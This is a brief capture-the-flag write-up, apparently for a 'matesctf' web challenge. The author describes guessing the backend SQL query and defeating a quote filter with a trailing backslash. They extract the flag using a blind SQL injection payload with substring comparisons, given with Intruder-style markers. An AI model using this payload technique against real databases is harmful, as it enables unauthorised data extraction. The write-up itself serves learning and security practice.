When I start with this challenge, firstly I guess SSRF, exploit bot, javascript, exploit something with Cryptocurrency, bla bla…
But solution is SQL Injection.
Firstly, Guessing how it work, I guessed it use action to call function. In the javascript file, i find getDomain() function
Secondly, Guessing the arguments, I guessed this function “getDomain” have one argument and it is coin.
I think I guess very well.
After that, I guessed the query like:
select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"
I guessed the character ‘,” is filtered or replaced, and I guessed the character \ didn’t replace or filter.
so I guessed my solution can be used character [\] to make [‘] be [\’] and escape query.
I used my payload to exploit:
action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
and got the flag in the table flag: matesctf: matesctf: fl4g_NT_h3r3_
but I guessed it is not the truly flag.
The real flag is in bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}
0xD0ff9 